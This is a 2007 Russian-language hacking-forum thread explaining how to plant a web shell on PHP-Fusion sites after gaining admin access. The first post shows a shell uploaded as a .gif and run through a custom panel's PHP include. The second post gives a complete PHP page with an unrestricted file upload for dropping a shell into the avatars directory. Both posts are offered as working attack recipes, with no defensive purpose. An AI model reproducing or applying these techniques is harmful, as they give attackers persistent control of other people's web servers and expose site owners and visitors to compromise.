Форумы Заливка shell'a в PHP-Fusion all version

Discussion in 'Уязвимости CMS/форумов' started by Romaxa55, 18 Jan 2007.

  1. Romaxa55

    Romaxa55 Banned

    Joined:
    19 Oct 2005
    Messages:
    144
    Likes Received:
    30
    Reputations:
    4
    Доброй ночи =)
    Просматрива ответы форума я не нашол ответа по заливки шела таких движков как Фюжин.. (а мож я и слепой =) );
    Я решил написать небольшую статейку по заливки шела с правами админа...

    Допустим вы получили админку а как залить шел не знаете?

    1)Заходим в адми панель => изображения => и загружаем шел с расширением gif;

    2) Заходим в панели и создаем панель с кодом

    PHP:
    openside("shell");
    include(    "images/shell.gif"); //Просто напросто инклудим и все.
    closeside();
    3)И готово размещаем панель по центу экрана (устанавливаем в настройках) и осталось только активировать... Дело сделано и дуем на главнуюю.. юзаем шелл;

    З.Ы. Прошу особо не грысть... написал статейку от нечего делать.. =) Может комунить пригодится...
     
    #1 Romaxa55, 18 Jan 2007
    Last edited: 18 Jan 2007
    2 people like this.
  2. arts

    arts Elder - Старейшина

    Joined:
    20 Jul 2005
    Messages:
    31
    Likes Received:
    1
    Reputations:
    0
    заходиш в админ панель
    там выбераеш меню Страницы
    добавляеш страницу с таким кодом
    <?php

    $site_name = $_SERVER['HTTP_HOST'];
    $url_dir = "http://".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF']);
    $url_this = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];

    $upload_dir = "images/avatars/";
    $upload_url = $url_dir."/images/avatars/";
    $message ="";



    if ($_FILES['userfile']) {
    $message = do_upload($upload_dir, $upload_url);
    }
    else {
    $message = "Invalid File Specified.";
    }

    print $message;

    function do_upload($upload_dir, $upload_url) {

    $temp_name = $_FILES['userfile']['tmp_name'];
    $file_name = $_FILES['userfile']['name'];
    $file_type = $_FILES['userfile']['type'];
    $file_size = $_FILES['userfile']['size'];
    $result = $_FILES['userfile']['error'];
    $file_url = $upload_url.$file_name;
    $file_path = $upload_dir.$file_name;

    //File Name Check
    if ( $file_name =="") {
    $message = "Invalid File Name Specified";
    return $message;
    }
    //File Size Check
    else if ( $file_size > 50000000000000000000000000000) {
    $message = "The file size is over 500K.";
    return $message;
    }


    $result = move_uploaded_file($temp_name, $file_path);
    $message = ($result)?"File url <a href=$file_url.>$file_url</a>" :
    "Somthing is wrong with uploading a file.";

    return $message;
    }

    ?>
    <form name="upload" id="upload" ENCTYPE="multipart/form-data" method="post">
    Upload Image<input type="file" id="userfile" name="userfile">
    <input type="submit" name="upload" value="Upload">
    </form>

    всё, перходиш на страницу загружаеш свой шелл

    (с) чесно непомню кто написал
     
    #2 arts, 18 Jan 2007
    Last edited: 18 Jan 2007
    1 person likes this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.